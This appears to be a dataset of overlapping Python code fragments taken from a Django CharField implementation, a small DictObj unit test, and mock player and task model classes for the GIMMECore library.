"'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if",
"id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error(",
"if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)):",
"False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None)",
"models from django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy",
"self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def",
"self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self,",
"\"'min_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ]",
"positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length <",
"if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value",
") ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self,",
"None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self,",
"check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or",
"< self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length'",
"class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset',",
"(self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return",
"super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value if not",
"else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs):",
"'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self,",
"return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not",
"= unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper() return",
"path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False,",
"'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, })",
"from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from",
"six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None or",
"self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value =",
"_('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False)",
"import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import",
"**kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset))",
"django.core.validators import MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding"
] |
[
"subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo == \"bar\"",
"\"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo",
"def test_dictobj(): subject_dict = { \"foo\": \"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict)",
"} subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo ==",
"\"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left')",
"hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo == \"bar\" assert subject_obj.left == \"right\"",
"\"left\": \"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert",
"redisbus.utility import DictObj def test_dictobj(): subject_dict = { \"foo\": \"bar\", \"left\": \"right\" }",
"assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo == \"bar\" assert subject_obj.left ==",
"= DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo == \"bar\" assert",
"test_dictobj(): subject_dict = { \"foo\": \"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict) assert",
"\"foo\": \"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj,",
"from redisbus.utility import DictObj def test_dictobj(): subject_dict = { \"foo\": \"bar\", \"left\": \"right\"",
"DictObj def test_dictobj(): subject_dict = { \"foo\": \"bar\", \"left\": \"right\" } subject_obj =",
"{ \"foo\": \"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert",
"import DictObj def test_dictobj(): subject_dict = { \"foo\": \"bar\", \"left\": \"right\" } subject_obj",
"DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo == \"bar\" assert subject_obj.left",
"= { \"foo\": \"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo')",
"subject_dict = { \"foo\": \"bar\", \"left\": \"right\" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj,"
] |
[
"minDuration, difficultyWeight, profileWeight): self.id = id self.description = description self.minRequiredAbility = minRequiredAbility self.profile",
"getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst):",
"currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def",
"def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)]",
"self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId,",
"self.currState = currState self.id = id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid #",
"GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst,",
"self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self,",
"class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState =",
"pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences)",
"getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def",
"def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players",
"self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def",
"preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile",
"def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def",
"= len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] =",
"self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self,",
"def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences =",
"self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics",
"= group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences):",
"self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self,",
"resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def",
"setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self):",
"playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def",
"def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId):",
"GIMMECore import TaskModelBridge from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name,",
"taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate",
"def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId):",
"playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst",
"profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def",
"playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def",
"group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences",
"self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId,",
"realPreferences): self.currState = currState self.id = id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid",
"profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight)",
"__init__(self, players): self.players = players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState,",
"PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState",
"return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self,",
"return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers = len(players)",
"setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group",
"realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration,",
"name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases,",
"taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players):",
"getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self,",
"self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState =",
"return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def",
"increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr",
"= tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences def getPlayerRealPreferences(self, playerId): return",
"PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def",
"playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics",
"import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):",
"def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId):",
"getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return",
"self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset()",
"tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences def getPlayerRealPreferences(self, playerId): return self.players[int(playerId)].realPreferences",
"self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class",
"profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return",
"range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self,",
"self.id = id self.description = description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight",
"pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset()",
"self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration",
"# self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object):",
"= minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration =",
"difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks",
"__init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description =",
"self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId): return",
"def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr):",
"def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases)",
"= pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None",
"self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst",
"in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def",
"setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences",
"preferencesEst, realPreferences): self.currState = currState self.id = id self.name = name self.pastModelIncreasesGrid =",
"in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def",
"profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks",
"profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self,",
"name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self,",
"self.players = players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases,",
"getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return",
"= preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self,",
"setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile",
"self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for",
"[int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId):",
"return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def",
"self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)]",
"def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name,",
"difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId):",
"getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return",
"return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players",
"return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst =",
"for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return",
"currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst,",
"currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId):",
"[int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId):",
"def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def",
"players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):",
"blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i)",
"return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class",
"registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState,",
"getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return",
"return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def",
"= difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks):",
"tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):",
"PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState",
"def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId):",
"TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id",
"players): self.players = players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid,",
"getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return",
"playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid",
"playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst",
"return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def",
"taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight",
"def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId):",
"self.id = id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized()",
"currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def",
"getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self,",
"TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i",
"return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def",
"class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers = len(players) def registerNewPlayer(self,",
"from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases,",
"playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate =",
"playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid,",
"import TaskModelBridge from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState,",
"self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self,",
"description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration,",
"= currState self.id = id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst",
"realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId,",
"= profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks):",
"CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers = len(players) def registerNewPlayer(self, playerId,",
"characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group",
"def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId):",
"= players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst,",
"description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description = description self.minRequiredAbility",
"taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile,",
"minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description = description self.minRequiredAbility =",
"playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def getPlayerName(self,",
"i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility",
"playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return",
"self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate",
"# self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description,",
"getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return",
"def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description,",
"= preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile):",
"def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile",
"name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id = id self.name",
"id self.description = description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight",
"self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self,",
"def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics =",
